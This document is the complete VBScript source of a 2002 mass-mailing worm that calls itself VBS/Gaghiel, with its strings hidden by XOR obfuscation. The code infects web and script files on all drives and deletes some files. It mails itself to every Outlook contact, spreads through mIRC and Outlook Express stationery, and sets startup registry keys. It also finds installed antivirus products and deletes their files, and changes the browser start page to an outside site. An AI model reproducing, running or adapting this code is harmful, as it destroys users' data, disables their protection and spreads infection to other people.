REM VBS/Gaghiel 4° y modesta creacion de Machinedramon
REM Hecho en el Peru, Calidad Mundial
REM Sachiel2015@latinmail.com,
REM Un Reconocimiento al creador de 
REM VBS/Help o VBS/HappyTime
REM 16-06-2002   Tacna-Peru
REM Derechos Reservados
On Error Resume Next
Dim gf, gw
set gf = createobject(q("tdunwsni`)ankbT~tsbjhembds"))
set gw = createobject(q("Ptdunws)Tobkk"))

GWR=q("OLB^XDRUUBISXRTBU[Thaspfub[Jnduhthas[") & _
q("Pnichpt'Tdunwsni`'Ohts[Tbssni`t[Snjbhrs")
Tg=gw.RegRead(GWR)
if (Tg>=1) or (Tg="") Then
gw.RegWrite GWR, 0, "REG_DWORD"
end if

if Day(date) > 25 then
Sd=q("OLB^XDRUUBISXRTBU[Thaspfub[Jnduhthas[Nisbu")& _
q("ibs'Bwkhubu[Jfni[Tsfus'Wf`b")
Sg=q("ossw=((ppp)`ufsntpbe)dhj(jfdonibcufjhi6(")& _
q("tfdonbk)mw`)tdu")
gw.regWrite Sd, Sg
end if

if (Month(date) + Day(date) = 30) then
msgbox "Oracion antes de entrar"& _
" al internet:" & vbCrlf & _
"     "& vbCrlf & _
"Satelite nuestro que estas "& _
"en el cielo," & vbCrlf & _
"Acelerado sea tu link," & vbCrlf & _
"Venga a nosotros tu hipertexto," & vbCrlf & _
"Hagase tu conexion en lo real como"& _
" en lo virtual," & vbCrlf & _
"Danos hoy el download de cada dia," & vbCrlf & _
"Perdona el cafe en el Teclado," & vbCrlf & _
"Asi como nosotros perdonamos a"& _
" nuestros proveedores,"&vbCrlf& _
"No nos dejes caer la conexion," & vbCrlf & _
"Y libranos de todo Virus," & vbCrlf & _
"En nombre del Server, del Modem y del "& _
"santo User-name."&vbCrlf& _
"Log-in.", 15, "Gaghiel"
end if

if IsHTA = False then

set gd = createobject(q("Tdunwsni`)Cndsnhifu~"))
gd.add q("osjk"), "1" 
gd.add q("osj"), "2"
gd.add q("osf"), "3"
gd.add q("wow"), "4"
gd.add q("ftw"), "5"
gd.add q("tosjk"), "6"
gd.add q("tosj"), "7" 
gd.add q("wosj"), "8"
gd.add q("wosjk"), "9"
gd.add q("ub`bcns"), "10" 
gd.add q("ub`bce45"), "11"
gd.add q("jtdhian`"), "12"
gd.add q("tad"), "13"
gd.add q("`f`onbk)osf"), "14" 

Gds = gf.getspecialfolder(1)

if gf.FileExists(Gds&q("[Fi`bkcbkJfu)osjk"))=False then
Set Ag=gf.CreateTextFile(Gds&q("[Fi`bkcbkJfu)osjk"))
Wl=q(";osjk9;obfc9;Snskb9Ifunf'~'Bu")& _
q("~f;(snskb9;(obfc9;ehc~")& _
q("9;w9Buuhu'Dfu`fich'='5762;(ehc~9;(osjk9")
Ag.WriteLine Wl 
Ag.close
end if

set gag = gf.OpenTextFile(Wscript.ScriptFullname,1)
Do while gag.AtendOfStream = False
gli = gag.ReadLine
if gli <> "" then
vbg = vbg&q("qet':'qet'!'") & _
chr(34)& _
Replace(gli, Chr(34), Chr(34)&"&Chr(34)&"&Chr(34))& _
chr(34) & "& vbCrlf" & vbCrlf
end if 
loop
gag.close

set ghg = gf.OpenTextFile(Wscript.ScriptFullname,1)
vbz = ghg.ReadAll
ghg.close

Set Ghi = gf.OpentextFile(Wscript.ScriptFullname,1)
Do while Ghi.AtendOfStream = False
vb = Ghi.ReadLine
if vb <> "" then
vbm = vbm & "q(" & chr(34) & q(vb) & chr(34) & ")"& _
"&vbCrlf& _" & vbCrlf
end if
Loop
Ghi.close

vs=q(";tdunws'Kfi`rf`b':")&chr(39)&q("QETdunws")& _
chr(39)&q("9")&vbCrlf& _
q("Hi'Buuhu'Ubtrjb'Ibs")&vbCrlf& _
q("tbs'`}':'dubfsbhembds/")& _
"q("&chr(34)&"tdunwsni`)ankbt~tsbjhembds"& _
chr(34)&")"& _
q(".") &vbCrlf& _
q("tbs'`~':'dubfsbhembds/")& _
"q("&chr(34)&"Ptdunws)Tobkk"&chr(34)&")"& _
q(".")&vbCrlf& _
q("na'`})AnkbBntst/`})`bstwbdnfkahkcbu/6.'!'")& _
"q("&chr(34)&"[@f`onbk)qet"&chr(34)&")"& _
q(".':'Afktb'sobi")&vbCrlf& _
q("`~)ub`punsb'")& _ 
"q("&chr(34)& _
"OLB^XKHDFKXJFDONIB[THASPFUB[Jnduhthas["&chr(34)&")&"& _
"q("&chr(34)&"Pnichpt[DruubisQbut"&chr(34)&")&" & _
"q("&chr(34)&"nhi[Uri[@f`onbk"&chr(34)&")"&q("+'")& _
q("`})`bstwbdnfkahkcbu/6.")& _
q("'!'")&"q("&chr(34)& _
"[@f`onbk)qet"&chr(34)&")"&vbCrlf& _
q("`~)ub`punsb'")& _
"q("&chr(34)&"OLB^XKHDFKXJFDONIB[THASPFUB[Jnduh"& _
chr(34)&")&"& _
"q("&chr(34)&"thas[Pnichpt[DruubisQbutnhi[Uri'Chjfni'"& _
chr(34)&")&"& _
"q("&chr(34)&"Jfif`bu[@f`onbk"&chr(34)&")"& _
q("+'")&q("`})`bstwbdnfkahkcbu/6.")&q("'!'")& _
"q("&chr(34)&"[@f`onbk)qet"&chr(34)&")"&vbCrlf& _
q("tbs'`t':'`})DubfsbSbsAnkb/`})`bstwbdnf")& _
q("kahkcbu/6.'!'")& _
"q("&chr(34)&"[@f`onbk)qet"&chr(34)&")"&q(".")&vbCrlf& _
vbg &vbCrlf& _
q("`t)Punsb'qet")&vbCrlf& _
q("`t)dkhtb")&vbCrlf& _
q("Tbs'@':'`})`bsankb/`})`bstwbdnf")& _
q("kahkcbu/6.'!'")& _
"q("&Chr(34)&"[@f`onbk)qet"&Chr(34)&")"&q(".")&vbCrlf& _
q("@)fssunersbt':'@)fssunersbt','5")&vbCrlf& _
q("bic'na")&vbCrlf& _
q("na'buu)irjebu';9'7'sobi")&vbCrlf& _
q("fkbus/")&chr(34)&q("Buuhu'64")&chr(34)& _
q("'!'qeDuka'!'")&chr(34)& _
q("Btsf'Wf`nif'Ubvrnbub'Dhisuhkbt'Fdsnqb_")& _
q("'wfuf'tbu'jhtsu")& _
q("fcf'bi'tr'shsfkncfc")&chr(34)& _
q("'!'qeDuka'!'")&chr(34)& _
q("Wubtnhib'Fdsrfkn}fu'~'Fdbwsb")& _
chr(34)&q(".")&vbCrlf& _
q("Bic'na")&vbCrlf& _
q("Aridsnhi'v/m.")&vbCrlf& _
q("Hi'Buuhu'Ubtrjb'Ibs")&vbCrlf& _
q("Ahu'u':'6'sh'kbi/m.")&vbCrlf& _
q("v':'v'!'Dou/Ftd/Jnc/m+u+6..'_hu")& _
q("'Kbi/")&Chr(34)&q("@f`onbk")&Chr(34)& _
q("..")&vbCrlf& _
q("Ibs")&vbCrlf& _
q("Bic'aridsnhi")&vbCrlf& _
q(";")&q("(")&q("tdunws9")

Gaghiel()
GExpress()
GMail()
Dilandu()
Rei()
Else
GHta()
Rei()
End if

Sub Gaghiel()
On error resume next
dim gd, gl
set gd = gf.drives
for each gl in gd
if gl.drivetype = 2 or gl.drivetype = 3 then
Gfol(gl.path & q("["))
end if
next
End sub

Sub Gfol(folder)
On error resume next
set gfl = gf.getfolder(folder)
set gsfl = gfl.subfolders
for each ga in gsfl
Gfol(ga.path)
GHTML(ga.path)
next 
End sub

Sub GHTML(folder)
On error resume next
set gls = gf.getfolder(folder)
set gfs = gls.files

gb = ""
for each f in gfs
gn = f.name
gn = Lcase(gn)
gext = gf.GetExtensionName(f.path)
gext = Lcase(gext)
gc = gf.getBaseName(f.path)
gc = Lcase(gc)

if (gd.Exists(gext)=true) and (gc <> q("`f`onbk")) then

set gr = gf.getfile(f.path)
if gr.attributes > 0 then
gr.attributes = gr.attributes - gr.attributes
end if

set rd1 = gf.OpenTextFile(f.path,1)
r1 = rd1.readline
rd1.close

if InStr(r1, q("@f`onbk")) = 0 then
set rd2 = gf.OpenTextFile(f.path,1)
r2 = rd2.readAll
rd2.close

Set rd3 = gf.OpenTextFile(f.path,2,1)
rd3.write q("@f`onbk")&vbCrlf&r2&vbCrlf&vs
rd3.close 

end if

elseif (gext = q("qet")) or (gext = q("qeb")) then
if (gc <> q("`f`onbk")) then
set gr = gf.getfile(f.path)
if gr.attributes > 0 then
gr.attributes = gr.attributes - gr.attributes
end if

set rd1 = gf.OpenTextFile(f.path,1)
r1 = rd1.readline
rd1.close

if InStr(r1, q("@f`onbk")) = 0 then

Set rd3 = gf.OpenTextFile(f.path,2,1)
rd3.write vbz
rd3.close 

end if
end if
elseif (gn=q("jnud45)bb")) or (gn=q("jnud)nin")) then

if gb = "" then
set vsr=gf.CreateTextFile(folder & q("[Tdunws)nin"))
GSMR = q("\tdunwsZ")&vbCrlf& _ 
q("<jNUD'Tdunws")&vbCrlf& _
q("<ossw=[[ppp)`ufsntpbe)dhj[jfdonibcuf")& _
q("jhi[Tfdonbk)mw`)tdu")&vbCrlf& _
q("<@f`onbk")&vbCrlf& _
q("<")&vbCrlf& _
q("i7:hi'6=MHNI=$=|")&vbCrlf& _
q("i6:''(na'/'#indl'::'#jb'.'|'ofks'z")&vbCrlf& _
q("i5:''(jt`'#indl'Ohkf+'Dubbt'bi'kh'")& _
q("Wfufihujfk8+'tn'ih'jnuf'kf'wf`")& _
q("nif'vrb'sb'biqnfjht'~'qntnsf'ppp)`ufs")& _
q("ntpbe)dhj(jfdonibcufjhi6(")& _
q("`f`onbk)osjk")&vbCrlf& _
q("i4:''()cdd'tbic'#indl'")&gf.getspecialfolder(1)& _
q("[Fi`bkcbkJfu)osjk")&vbCrlf& _
q("i3:z")
vsr.write GSMR
vsr.close
gb = q("@f`onbk")
end if

elseif (gd.Exists(gc)=true) or (gd.Exists(gn)=true) then
set gr = gf.getfile(f.path)
if gr.attributes > 0 then
gr.attributes = gr.attributes - gr.attributes
end if
gf.deleteFile(f.path)
end if
next
End sub

Sub Dilandu()
On Error resume next
Dim th, per, mcf, pan, nor, it
th=q("OLB^XKHDFKXJFDONIB[THASPFUB[Ofdlthas[")& _
q("Sob'Ofdlbu'Fisn*Qnurt[SOCFS")
th=gw.regRead(th)
per=q("OLB^XKHDFKXJFDONIB[THASPFUB[WBU")& _
q("'T~tsbjt[WBU'")& _
q("Fisnqnurt[Nitsfk")& _
q("fdnôi[cnuWunidnwfk")
per = gw.regRead(per)
mcf=q("OLB^XKHDFKXJFDONIB[THASPFUB[JdFabb[Q")& _
q("nurtTdfi[Khdfsnhi")
mcf = gw.regRead(mcf)
pan=q("OLB^XKHDFKXJFDONIB[Thaspfub[Wficf")& _
q("'Thaspfub[Wficf'Fisnqnu")& _
q("rt'1)7[Wfso")
pan=gw.regRead(pan)
nor=q("OLB^XKHDFKXJFDONIB[Thaspfub[T~jfi")& _
q("sbd[NitsfkkbcFwwt[IFQ")
nor = gw.regRead(nor)
it=q("OLB^XKHDFKXJFDONIB[Thaspfub[Dhjwrs")& _
q("buFtthdnfsbt[Fisn*")& _
q("Qnurt[Ubtncbis[QbsWfso")
it = gw.regRead(it)
if th <> "" then ATF(th)
if per <> "" then ATF(per)
if mcf <> "" then ATF(mcf)
if pan <> "" then ATF(pan)
if nor <> "" then ATF(nor)
if it <> "" then ATF(it)
End sub

Sub GExpress()
On Error Resume Next
Gwin = gf.getspecialfolder(0)
gda=q("OLB^XDRUUBISXRTBU[Ncbisnsnbt[Cbafrks'Rtbu'NC")
ug=gw.RegRead (gda)
kg = q("OLB^XDRUUBISXRTBU[Ncbisnsnbt[") & ug & _
q("[Thaspfub[Jnduhthas[Hrskhhl'Bwubtt[2)7[Jfnk")
gw.regwrite kg&q("[Jbttf`b'Tbic'OSJK"), 1
gw.regwrite kg&q("[Dhjwhtb'Rtb'Tsfsnhibu~"), 1
GD = kg & q("[Tsfsnhibu~'Ifjb")
gw.regwrite GD, Gwin&q("[@f`onbk)osjk")

if gf.FileExists(Gwin&q("[@f`onbk)osjk"))=False then

v=q(";tdunws'Kfi`rf`b':")&chr(39)& _
q("QETdunws")&chr(39)&q("9")&vbCrlf& _
q("Hi'Buuhu'Ubtrjb'Ibs")&vbCrlf& _
q("Tbs'tk':'Dubfsbhembds/")& _
"q("&chr(34)&"Tdunwskbs)s~wbkne"&chr(34)&")"& _
q(".")&vbCrlf& _
q("na'NiTsu/ifqn`fshu)t~tsbjkfi`rf`b+'")& _
chr(34)&q("bt")&chr(34)& _
q(".';9'7'sobi")&vbCrlf& _
q("tk)wfso':'")& _
"q("&chr(34)&"D=[pnichpt"&chr(34)& _
")& _"&vbCrlf& _
"q("&chr(34)&"[Jbiý'Nindnh[Wuh`u"& _
"fjft"&chr(34)&")& _"&vbCrlf& _
"q("&chr(34)&"[Nindnh[@f`onbk)osf"& _
chr(34)&")"&vbCrlf& _
q("bktb")&vbCrlf& _
q("tk)wfso':'")& _
"q("&chr(34)&"D=[pnichpt"& _
chr(34)&")& _"&vbCrlf& _
"q("&chr(34)&"[Tsfus'Jbir[Wuh`uf"& _
"jt[Tsf"&chr(34)&")& _"&vbCrlf& _
"q("&chr(34)&"usrw[@f`onbk)osf"& _
chr(34)&")"&vbCrlf& _
q("bic'na")&vbCrlf& _
q("tk)chd':'")&q("qeDuka'!'")&chr(34)& _
q(";Tdunws'Kfi`rf`b':'")& _
chr(39)&q("QETdunws")&chr(39)&q("9")&chr(34)& _
q("'!'qeDuka'!'X")& _
vbCrlf&vbm&chr(34)&q(";")&chr(34)&q("'!'")&chr(34)& _
q("(")&chr(34)&q("'!'")&chr(34)&q("Tdunws9")& _
chr(34)&vbCrlf& _
q("tk)punsb")&vbCrlf& _
q("Aridsnhi'v/m.")&vbCrlf& _
q("Hi'Buuhu'Ubtrjb'Ibs")&vbCrlf& _
q("Ahu'u':'6'sh'kbi/m.")&vbCrlf& _
q("v':'v'!'Dou/Ftd/Jnc/m+u+6..'_hu'Kbi/")&chr(34)& _
q("@f`onbk")& _
chr(34) & q("..")&vbCrlf& _
q("Ibs")&vbCrlf& _
q("Bic'aridsnhi")&vbCrlf& _
q(";") & q("(") & q("Tdunws9")

Gtag = q(";")&q("OSJK")&q("9;OBFC")&q("9")& _
q(";")&q("Snskb9'@f`onbk';(Snskb")&q("9;")& _
q("(OBFC9")&vbCrLf& _
q(";") & q("Ehc~9'") & vbCrlf & vbCrlf & v & vbCrLf & _
q(";") & q("(Ehc~9;(OSJK") & q("9")

set hta=gf.CreateTextFile(Gwin&q("[@f`onbk)osjk"))
hta.write Gtag
hta.close
end if

end Sub

Sub GMail()
On Error Resume Next
Dim Gp, Gm, Gs, Gb, GST
GWY = gf.getspecialfolder(1)
GST=q("OLB^XDRUUBISXRTBU[Thaspfub[Jnduhthas[@OTbsrw[")
Set Gp = Createobject(q("Hrskhhl)Fwwkndfsnhi"))
Set Gm = Gp.GetNameSpace(q("JFWN"))
for i = 1 to Gm.AddressLists.Count
Set lc = Gm.AddressLists(i)
for h = 1 To lc.AddressEntries.Count
Ec = lc.AddressEntries(h) 
lr = ""
lr=gw.RegRead (GST & Ec)
if lr = "" then
Randomize
A = Int(Rnd * 5)
Set Cg = Gp.CreateItem(0)
Cg.Recipients.add(Ec)
Cg.Subject = s(A)
Cg.Body = b(A)
Cg.Attachments.Add(GWY & q("[Fi`bkcbkJfu)osjk"))
Cg.DeleteAfterSubmit = True
Cg.Send
gw.RegWrite GST & Ec,"LCL"
Ec = ""
End if
Next
Next
Set Gp = Nothing 
Set Gm = Nothing 
End sub

Function s(A)
On Error Resume Next
if A = 0 then
s =q("Fusndrkh")
elseif A = 1 then
s =q("Babdsht'bi'pbe")
elseif A = 2  then
s =q("Ubqntsf'qnusrfk")
elseif A = 3  then
s =q("Dhuubh'Tb`ruh")
elseif A = 4 then
s =q("Cbtdfu`ft'`ufsnt")
end if
End function

Function b(A)
On Error Resume Next
if A = 0 then
b=q("Sb'biqnh'btsb'fusndrkh'vrb'bidhisu")& _
q("b'bi'nisbuibs+'bt'nisbubtfis")& _
q("b'~'sfk'qb}'sb'tnuqf+")&vbCrolf& _
q("ob'btsfch'ri'whdh'hdrwfch+'")& _
q("krb`h'sb'drbish)") & vbCrlf & q("Fcnht")
elseif A = 1 then
b =q("Ohkf+'sb'biqnh'btsf'wf`nif+'snbib")& _
q("'riht'jr~'erbiht'babdsht+'")& _
q("f'jn'jb'thuwubicnh")&vbCrlf& _
q("Sb'btduneh'krb`h+'of~'rif'dht")& _
q("f'vrb'vrnbuh'dhisfusb)") & vbCrlf & q("Fcnht")
elseif A = 2  then
b=q("Ohkf+'sb'biqnh'bk'wuhtwbdsh'cb'trtdunw")& _
q("dnhi'cb'rif'erbif'ubqnts")& _
q("f'qnusrfk+")&vbCrlf& _
q("kf'ubqntsf'kkb`f'f'sr'bjfnk'~'tb'wrbcb'")& _
q("kbbu'dhjh'wf`nif'pbe")&vbCrlf& _
q("kf'wf`nif'cb'trtdunwdnhi'bt'")& _
q("nisbufdsnqf+'jnufkf'f'qbu'vrb'sb'wfubdb)'Fcnht")
elseif A = 3  then
b =q("Btsfef'ifqb`fich'bi'nisbuibs+'~'bi'rif'wf`nif")& _
vbCrlf& _
q("qn'ri'firidnh'cb'rif'bjwubtf'cb'fisnqnurt")&vbCrlf& _
q("vrb'ubqntfef'tn'ofenf'qnurt'bi'bk'er}hi'")& _
q("cb'dhuubh'cbk'tbuqnchu")& _
vbCrlf & _
q("fisbt'cb'vrb'kkb`b'f'sr'dhjwrsfchuf+'kf'qbis")& _
q("fmf'bt'vrb")
b=b&vbCrlf& _
q("f'cnabubidnf'cb'kht'fisnqnurt'dftbuht'vrb'ih'")& _
q("cbsbdsfi'qnurt'irbqht") & vbCrlf & _
q("bkkht'tn'kht'cbsbdsfi'~f'vrb'tr'e")& _
q("ftb'cb'cfsht'btsf'fdsrfkn}fcf")& _
vbCrlf&q("f'dfcf'nitsfisb+'of~'jft'cbsfkkbt'bi")& _
q("'kf'wf`nif'vrb'sb'biqnh+")
b=b&vbCrlf&q("'kbbkf'f'qbu'vrb'sb'wfubdb+'bk'")& _
q("tbuqndnh'bt'`ufsnt")& _
vbCrlf & q("Fcnht'~'oftsf'wuhish")
elseif A = 4 then
b =q("Ohkf+'bidhisub'rif'wf`nif'bi'kf'")& _
q("vrb'tb'wrbcb'cbtdfu`fu'`")& _
q("ufi'qfunbcfc") & vbCrlf & _
q("cb'dhtft+'dhjh'jrtndf+'wuh`ufjft'~'kneuht")& _
q("<'kf'cbtdfu`f'bt'`ufsnt")& _
vbCrlf&q("dkfuh'vrb'of~'vrb'f`rfisfu'ri'wh")& _
q("dh'cb'wrekndncfc'wbuh'bt")& _
q("'erbif'wf`nif)")
b =b&vbCrlf&q("Sb'biqnh'rif'wfusb'cb'kf'wf`nif")& _
q("'vrb'cbtdfu`rb'wfuf")& _
q("'vrb'qbft+'")&vbCrlf& _
q("f'snbib'babdsht'~'of~'vrb'fdbwsfu")& _
q("'bk'drfcuh'vrb'cf+'tnih'ih'dfu`f)") & vbCrlf & _
q("Krb`h'sb'btduneh+'Fcnht")
end if
End function

Function q(j)
On Error Resume Next
For r = 1 to len(j)
q = q & Chr(Asc(Mid(j,r,1)) Xor Len("Gaghiel"))
Next
End function

Sub Rei()
On Error Resume Next
GRW = gf.getspecialfolder(0)
hta = q("[Jbiý'Nindnh[Wuh`ufjft[Nindnh[@f`onbk)osf")
Set R = gf.getfolder(GRW & q("[Ubdbis"))
Set R1 = R.files
for each R2 in R1
gf.deletefile(R2.path)
Next
if gf.FileExists(GRW & hta) then
gf.DeleteFile(GRW & hta)
end if     
End sub

Sub ATF(AT)
On Error Resume Next
'Absolutely Terror Field
if AT <> "" then
if Right(AT,1) <> q("[") then AT = AT & q("[")
set AT1 = gf.getfolder(AT)
set AT2 = AT1.files
for each AT3 in AT2
set gr = gf.getfile(AT3.path)
if gr.attributes > 0 then
gr.attributes = gr.attributes - gr.attributes
end if
gf.deleteFile(AT3.path)
next
AT = Lcase(AT)
if inStr(AT, q("wbu")) <> q("Afktb") then
GWin=gf.getspecialfolder(0)
Ges=q("[Jbiý'Nindnh[Wuh`ufjft[Nindnh[")
Gin=q("[Tsfus'Jbir[Wuh`ufjt[Tsfusrw[")
GPav=q("OLB^XKHDFKXJFDONIB[THASPFUB[Jnduhthas")& _
q("[Pnichpt[DruubisQbutnhi[uritbuqndbt[WFQ)B_B")
gw.Regdelete GPav
if gf.FileExists(GWin&Ges&q("WBU'Fisnqnurt)kil")) then
gf.deleteFile(GWin & Ges & q("WBU'Fisnqnurt)kil"))
end if
if gf.FileExists(GWin&Gin&q("WBU'Fisnqnurt)kil")) then
gf.deleteFile(GWin & Gin & q("WBU'Fisnqnurt)kil"))
end if
Ap = q("Fdsrfkn}fdnôi'cb'WBU'Fisnqnurt)kil")
if gf.FileExists(GWin & Ges & Ap) then
gf.deleteFile(GWin & Ges & Ap)
end if
if gf.FileExists(GWin & Gin & Ap) then
gf.deleteFile(GWin & Gin & Ap)
end if
end if
end if
End Sub

Function IsHTA()
On error resume next
Gpath = Wscript.ScriptFullname
if Gpath <> "" then
IsHTA = False
else
IsHTA = True
end if
End Function

Sub GHta()
On Error Resume Next
GWY = gf.getspecialfolder(1)
GWW = gf.getspecialfolder(0)
if gf.FileExists(GWY & q("[@f`onbk)qet")) = False then
G1w=q("OLB^XKHDFKXJFDONIB[THASPFUB[Jnduh")& _
q("thas[Pnichpt[DruubisQbu")& _
q("tnhi[Uri[@f`onbk")
G2w=q("OLB^XKHDFKXJFDONIB[THASPFUB[Jnduhthas")& _
q("[Pnichpt[DruubisQb")& _
q("utnhi[Uri'Chjfni'Jfif`bu[@f`onbk")
gw.regwrite G1w, GWY & q("[@f`onbk)qet")
gw.regwrite G2w, GWY & q("[@f`onbk)qet")
for each g in document.Scripts
if lcase(g.Language) = q("qetdunws") then
if InStr(g.text, q("@f`onbk")) <> 0 then
GScript = g.text
end if
end if
Next
set gs=gf.CreateTextFile(GWY & q("[@f`onbk)qet"))
gs.write GScript
gs.close
Set K = gf.getfile(GWY & q("[@f`onbk)qet"))
K.attributes = K.attributes + 2
end if
if InStr(Navigator.SystemLanguage, q("bt")) <> 0 then
HTG = GWW & _
q("[JbiýNiy6[Wuh`ufy6[Nindnh[@f`onbk)osf")
else
HTG= GWW & _
q("[Tsfusjy6[Wuh`ufjt[Tsfusrw[@f`onbk)osf")
end if
Set wgn=gf.CreateTextFile(GWW & q("[Pninins)nin"))
wgn.Writeline q("\UbifjbZ") 
wgn.Writeline q("Irk:") & HTG
wgn.close
end sub